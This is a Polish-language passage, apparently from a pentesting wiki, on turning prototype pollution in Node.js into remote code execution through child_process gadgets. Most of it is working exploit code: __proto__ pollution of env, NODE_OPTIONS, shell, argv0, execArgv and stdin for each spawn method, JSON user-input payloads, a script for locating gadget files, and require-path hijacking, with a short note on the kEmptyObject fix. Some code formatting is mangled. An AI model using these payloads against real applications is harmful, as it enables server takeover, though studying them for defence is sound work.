Wyobraź sobie prawdziwy JS używający kodu podobnego do poniższego:
const { execSync,fork } =require('child_process');functionisObject(obj) {console.log(typeof obj);returntypeof obj ==='function'||typeof obj ==='object';}// Function vulnerable to prototype pollutionfunctionmerge(target, source) {for (let key in source) {if (isObject(target[key]) &&isObject(source[key])) {merge(target[key], source[key]);} else {target[key] = source[key];}}return target;}functionclone(target) {returnmerge({}, target);}// Run prototype pollution with user input// Check in the next sections what payload put here to execute arbitrary codeclone(USERINPUT);// Spawn process, this will call the gadget that poputales env variables// Create an a_file.js file in the current dir: `echo a=2 > a_file.js`var proc =fork('a_file.js');
PP2RCE poprzez zmienne środowiskowe
PP2RCE oznacza Zanieczyszczenie Prototypu do Wykonania Kodu Zdalnego (Remote Code Execution).
Zgodnie z tym opisem gdy uruchamiany jest proces za pomocą pewnej metody z child_process (takiej jak fork lub spawn lub inne), wywoływana jest metoda normalizeSpawnArguments, która jest gadżetem zanieczyszczenia prototypu do tworzenia nowych zmiennych środowiskowych:
Sprawdź ten kod, możesz zobaczyć, że jest możliwe zatrucie envPairs poprzez zanieczyszczenie atrybutu .env.
Zatrucie __proto__
Zauważ, że ze względu na to, jak działa funkcja normalizeSpawnArguments z biblioteki child_process w node, gdy coś jest wywoływane w celu ustawienia nowej zmiennej środowiskowej dla procesu, wystarczy zanieczyścić cokolwiek.
Na przykład, jeśli wykonasz __proto__.avar="valuevar", proces zostanie uruchomiony z zmienną o nazwie avar o wartości valuevar.
Jednakże, aby zmienna środowiskowa była pierwsza, musisz zanieczyścić atrybut.env i (tylko w niektórych metodach) ta zmienna będzie pierwsza (umożliwiając atak).
Dlatego NODE_OPTIONS nie znajduje się wewnątrz .env w poniższym ataku.
const { execSync,fork } =require('child_process');// Manual Pollutionb = {}b.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/pp2rce').toString())//"}b.__proto__.NODE_OPTIONS="--require /proc/self/environ"// Trigger gadgetvar proc =fork('./a_file.js');// This should create the file /tmp/pp2rec// Abusing the vulnerable codeUSERINPUT = JSON.parse('{"__proto__": {"NODE_OPTIONS": "--require /proc/self/environ", "env": { "EVIL":"console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce\\\").toString())//"}}}')
clone(USERINPUT);var proc =fork('a_file.js');// This should create the file /tmp/pp2rec
Interakcja z DNS
Za pomocą poniższych ładunków możliwe jest nadużycie zmiennej środowiskowej NODE_OPTIONS, o której wcześniej rozmawialiśmy, i sprawdzenie, czy działa poprzez interakcję z DNS:
W tej sekcji będziemy analizować każdą funkcję z child_process w celu wykonania kodu i zobaczenia, czy możemy użyć jakiejkolwiek techniki, aby zmusić tę funkcję do wykonania kodu:
exec eksploatacja
// environ trick - not working// It's not possible to pollute the .env attr to create a first env var// because options.env is null (not undefined)// cmdline trick - working with small variation// Working after kEmptyObject (fix)const { exec } =require('child_process');p = {}p.__proto__.shell ="/proc/self/exe"//You need to make sure the node executable is executedp.__proto__.argv0 ="console.log(require('child_process').execSync('touch /tmp/exec-cmdline').toString())//"p.__proto__.NODE_OPTIONS="--require /proc/self/cmdline"var proc =exec('something');// stdin trick - not working// Not using stdin// Windows// Working after kEmptyObject (fix)const { exec } =require('child_process');p = {}p.__proto__.shell ="\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"var proc =exec('something');
execFile eksploatacja
```javascript // environ trick - not working // It's not possible to pollute the .en attr to create a first env var
// cmdline trick - working with a big requirement // Working after kEmptyObject (fix) const { execFile } = require('child_process'); p = {} p.proto.shell = "/proc/self/exe" //You need to make sure the node executable is executed p.proto.argv0 = "console.log(require('child_process').execSync('touch /tmp/execFile-cmdline').toString())//" p.proto.NODE_OPTIONS = "--require /proc/self/cmdline" var proc = execFile('/usr/bin/node');
// stdin trick - not working // Not using stdin
// Windows - not working
Aby **`execFile`** działał, **MUSI wykonać node** dla NODE\_OPTIONS aby działało.\
Jeśli **nie** wykonuje **node**, musisz znaleźć sposób, jak **zmodyfikować wykonanie** tego, co jest wykonywane **za pomocą zmiennych środowiskowych** i je ustawić.
**Inne** techniki **działają** bez tego wymagania, ponieważ jest **możliwe zmodyfikowanie** **tego, co jest wykonywane** za pomocą zanieczyszczenia prototypu. (W tym przypadku, nawet jeśli zanieczyszczisz `.shell`, nie zanieczyszczysz tego, co jest wykonywane).
</details>
<details>
<summary>Wykorzystanie <code>fork</code></summary>
<div data-gb-custom-block data-tag="code" data-overflow='wrap'>
```javascript
// environ trick - working
// Working after kEmptyObject (fix)
const { fork } = require('child_process');
b = {}
b.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/fork-environ').toString())//"}
b.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = fork('something');
// cmdline trick - working
// Working after kEmptyObject (fix)
const { fork } = require('child_process');
p = {}
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/fork-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = fork('something');
// stdin trick - not working
// Not using stdin
// execArgv trick - working
// Only the fork method has this attribute
// Working after kEmptyObject (fix)
const { fork } = require('child_process');
b = {}
b.__proto__.execPath = "/bin/sh"
b.__proto__.argv0 = "/bin/sh"
b.__proto__.execArgv = ["-c", "touch /tmp/fork-execArgv"]
var proc = fork('./a_file.js');
// Windows
// Working after kEmptyObject (fix)
const { fork } = require('child_process');
b = {}
b.__proto__.execPath = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
var proc = fork('./a_file.js');
spawn eksploatacja
```javascript // environ trick - working with small variation (shell and argv0) // NOT working after kEmptyObject (fix) without options const { spawn } = require('child_process'); p = {} // If in windows or mac you need to change the following params to the path of ndoe p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawn-environ').toString())//"} p.__proto__.NODE_OPTIONS = "--require /proc/self/environ" var proc = spawn('something'); //var proc = spawn('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)
// cmdline trick - working with small variation (shell) // NOT working after kEmptyObject (fix) without options const { spawn } = require('child_process'); p = {} p.proto.shell = "/proc/self/exe" //You need to make sure the node executable is executed p.proto.argv0 = "console.log(require('child_process').execSync('touch /tmp/spawn-cmdline').toString())//" p.proto.NODE_OPTIONS = "--require /proc/self/cmdline" var proc = spawn('something'); //var proc = spawn('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)
// stdin trick - not working // Not using stdin
// Windows // NOT working after require(fix) without options const { spawn } = require('child_process'); p = {} p.proto.shell = "\\127.0.0.1\C$\Windows\System32\calc.exe" var proc = spawn('something'); //var proc = spawn('something',[],{"cwd":"C:\"}); //To work after kEmptyObject (fix)
</details>
<details>
<summary><strong><code>execFileSync</code> eksploatacja</strong></summary>
```javascript
// environ trick - working with small variation (shell and argv0)
// Working after kEmptyObject (fix)
const { execFileSync } = require('child_process');
p = {}
// If in windows or mac you need to change the following params to the path of ndoe
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/execFileSync-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = execFileSync('something');
// cmdline trick - working with small variation (shell)
// Working after kEmptyObject (fix)
const { execFileSync } = require('child_process');
p = {}
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/execFileSync-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = execFileSync('something');
// stdin trick - working
// Working after kEmptyObject (fix)
const { execFileSync } = require('child_process');
p = {}
p.__proto__.argv0 = "/usr/bin/vim"
p.__proto__.shell = "/usr/bin/vim"
p.__proto__.input = ':!{touch /tmp/execFileSync-stdin}\n'
var proc = execFileSync('something');
// Windows
// Working after kEmptyObject (fix)
const { execSync } = require('child_process');
p = {}
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
p.__proto__.argv0 = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
var proc = execSync('something');
execSync eksploatacja
```javascript // environ trick - working with small variation (shell and argv0) // Working after kEmptyObject (fix) const { execSync } = require('child_process'); p = {} // If in windows or mac you need to change the following params to the path of ndoe p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/execSync-environ').toString())//"} p.__proto__.NODE_OPTIONS = "--require /proc/self/environ" var proc = execSync('something');
// cmdline trick - working with small variation (shell) // Working after kEmptyObject (fix) const { execSync } = require('child_process'); p = {} p.proto.shell = "/proc/self/exe" //You need to make sure the node executable is executed p.proto.argv0 = "console.log(require('child_process').execSync('touch /tmp/execSync-cmdline').toString())//" p.proto.NODE_OPTIONS = "--require /proc/self/cmdline" var proc = execSync('something');
// stdin trick - working // Working after kEmptyObject (fix) const { execSync } = require('child_process'); p = {} p.proto.argv0 = "/usr/bin/vim" p.proto.shell = "/usr/bin/vim" p.proto.input = ':!{touch /tmp/execSync-stdin}\n' var proc = execSync('something');
// Windows // Working after kEmptyObject (fix) const { execSync } = require('child_process'); p = {} p.proto.shell = "\\127.0.0.1\C$\Windows\System32\calc.exe" var proc = execSync('something');
</details>
<details>
<summary><strong><code>spawnSync</code> eksploatacja</strong></summary>
```javascript
// environ trick - working with small variation (shell and argv0)
// NOT working after kEmptyObject (fix) without options
const { spawnSync } = require('child_process');
p = {}
// If in windows or mac you need to change the following params to the path of node
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)
// cmdline trick - working with small variation (shell)
// NOT working after kEmptyObject (fix) without options
const { spawnSync } = require('child_process');
p = {}
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.argv0 = "console.log(require('child_process').execSync('touch /tmp/spawnSync-cmdline').toString())//"
p.__proto__.NODE_OPTIONS = "--require /proc/self/cmdline"
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)
// stdin trick - working
// NOT working after kEmptyObject (fix) without options
const { spawnSync } = require('child_process');
p = {}
p.__proto__.argv0 = "/usr/bin/vim"
p.__proto__.shell = "/usr/bin/vim"
p.__proto__.input = ':!{touch /tmp/spawnSync-stdin}\n'
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"/tmp"}); //To work after kEmptyObject (fix)
// Windows
// NOT working after require(fix) without options
const { spawnSync } = require('child_process');
p = {}
p.__proto__.shell = "\\\\127.0.0.1\\C$\\Windows\\System32\\calc.exe"
var proc = spawnSync('something');
//var proc = spawnSync('something',[],{"cwd":"C:\\"}); //To work after kEmptyObject (fix)
Wymuszanie uruchomienia
W poprzednich przykładach zobaczyłeś, jak wywołać funkcję gadżetu, która wywołuje spawn, musi być obecna funkcjonalność (wszystkie metody child_process używane do wykonania czegoś ją wywołują). W poprzednim przykładzie była to część kodu, ale co jeśli kod jej nie wywołuje.
Kontrolowanie ścieżki pliku require
W tym innym opisie użytkownik może kontrolować ścieżkę pliku, w którym zostanie wykonane require. W takim scenariuszu atakujący musi po prostu znaleźć plik .js w systemie, który wywoła metodę spawn podczas importowania.
Niektóre przykłady powszechnych plików wywołujących funkcję spawn podczas importowania to:
/path/to/npm/scripts/changelog.js
/opt/yarn-v1.22.19/preinstall.js
Znajdź więcej plików poniżej
Następujący prosty skrypt będzie szukał wywołań z child_processbez żadnego wcięcia (aby uniknąć pokazywania wywołań wewnątrz funkcji):
find/-name"*.js"-typef-execgrep-l"child_process"{} \; 2>/dev/null|whilereadfile_path; dogrep --with-filename -nE "^[a-zA-Z].*(exec\(|execFile\(|fork\(|spawn\(|execFileSync\(|execSync\(|spawnSync\()" "$file_path" | grep -v "require(" | grep -v "function " | grep -v "util.deprecate" | sed -E 's/.{255,}.*//'
done# Note that this way of finding child_process executions just importing might not find valid scripts as functions called in the root containing child_process calls won't be found.
Interesujące pliki znalezione przez poprzedni skrypt
node_modules/node-pty/scripts/publish.js:31:const result = cp.spawn('npm', args, { stdio: 'inherit' });
Ustawianie ścieżki pliku wymaganego za pomocą zanieczyszczenia prototypu
Poprzednia technika wymaga, aby użytkownik kontrolował ścieżkę pliku, który ma być wymagany. Ale to nie zawsze jest prawdą.
Jednak jeśli kod ma wykonać wymaganie po zanieczyszczeniu prototypu, nawet jeśli nie kontrolujesz ścieżki, która ma być wymagana, możesz wymusić inną, nadużywając zanieczyszczenia prototypu. Dlatego nawet jeśli linia kodu wygląda jak require("./a_file.js") lub require("bytes"), zostanie wymagany zanieczyszczony pakiet.
Dlatego jeśli wymaganie jest wykonywane po zanieczyszczeniu prototypu i nie ma funkcji spawn, to jest to atak:
Znajdź plik .js w systemie, który po wymaganiuwykona coś za pomocą child_process
Jeśli możesz przesłać pliki na platformę, którą atakujesz, możesz przesłać taki plik
Zanieczyszczaj ścieżki, aby wymusić załadowanie pliku .js, który wykona coś z child_process
Zanieczyszczaj środowisko/cmdline, aby wykonać arbitralny kod, gdy wywołana zostanie funkcja wykonania child_process (patrz początkowe techniki)
Wymaganie absolutne
Jeśli wymagane jest bezwzględne (require("bytes")) i pakiet nie zawiera głównego pliku w pliku package.json, możesz zanieczyścić atrybut main i sprawić, że wymaganie wykona inny plik.
// Create a file called malicious.js in /tmp// Contents of malicious.js in the other tab// Install package bytes (it doesn't have a main in package.json)// npm install bytes// Manual Pollutionb = {}b.__proto__.main ="/tmp/malicious.js"// Trigger gadgetvar proc =require('bytes');// This should execute the file /tmp/malicious.js// The relative path doesn't even need to exist// Abusing the vulnerable codeUSERINPUT = JSON.parse('{"__proto__": {"main": "/tmp/malicious.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce_absolute\\\").toString())//"}}')
clone(USERINPUT);var proc =require('bytes');// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
const { fork } =require('child_process');console.log("Hellooo from malicious");fork("anything");
Względne require - 1
Jeśli zamiast bezwzględnej ścieżki zostanie załadowana ścieżka względna, możesz sprawić, że node załaduje inną ścieżkę:
// Create a file called malicious.js in /tmp// Contents of malicious.js in the other tab// Manual Pollutionb = {}b.__proto__.exports = { ".":"./malicious.js" }b.__proto__["1"] ="/tmp"// Trigger gadgetvar proc =require('./relative_path.js');// This should execute the file /tmp/malicious.js// The relative path doesn't even need to exist// Abusing the vulnerable codeUSERINPUT = JSON.parse('{"__proto__": {"exports": {".": "./malicious.js"}, "1": "/tmp", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce_exports_1\\\").toString())//"}}')
clone(USERINPUT);var proc =require('./relative_path.js');// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
const { fork } =require('child_process');console.log("Hellooo from malicious");fork('/path/to/anything');
Względne require - 2
// Create a file called malicious.js in /tmp// Contents of malicious.js in the other tab// Manual Pollutionb = {}b.__proto__.data = {}b.__proto__.data.exports = { ".":"./malicious.js" }b.__proto__.path ="/tmp"b.__proto__.name ="./relative_path.js"//This needs to be the relative path that will be imported in the require// Trigger gadgetvar proc =require('./relative_path.js');// This should execute the file /tmp/malicious.js// The relative path doesn't even need to exist// Abusing the vulnerable codeUSERINPUT = JSON.parse('{"__proto__": {"data": {"exports": {".": "./malicious.js"}}, "path": "/tmp", "name": "./relative_path.js", "NODE_OPTIONS": "--require /proc/self/cmdline", "argv0": "console.log(require(\\\"child_process\\\").execSync(\\\"touch /tmp/pp2rce_exports_path\\\").toString())//"}}')
clone(USERINPUT);var proc =require('./relative_path.js');// This should execute the file /tmp/malicious.js wich create the file /tmp/pp2rec
W artykule https://arxiv.org/pdf/2207.11171.pdf wskazano również, że kontrola contextExtensions z niektórych metod biblioteki vm mogłaby być wykorzystana jako gadżet.
Jednak, podobnie jak poprzednie metody child_process, została naprawiona w najnowszych wersjach.
Naprawy i Nieoczekiwane zabezpieczenia
Należy zauważyć, że zanieczyszczenie prototypu działa, jeśli atrybut obiektu, do którego się odwołujemy, jest niezdefiniowany. Jeśli w kodzie ten atrybut jest ustawiony na wartość, nie będzie można go nadpisać.
W czerwcu 2022 z tego zobowiązania zmiast {} zmienna options to kEmptyObject. Co zapobiega zanieczyszczeniu prototypu wpływającemu na atrybutyoptions w celu uzyskania RCE.
Przynajmniej od wersji 18.4.0 to zabezpieczenie zostało wdrożone, dlatego też eksploityspawn i spawnSync wpływające na metody już nie działają (jeśli nie używane są options!).
W tym zobowiązaniuzanieczyszczenie prototypucontextExtensions z biblioteki vm zostało również naprawione poprzez ustawienie opcji na kEmptyObject zamiast {}.
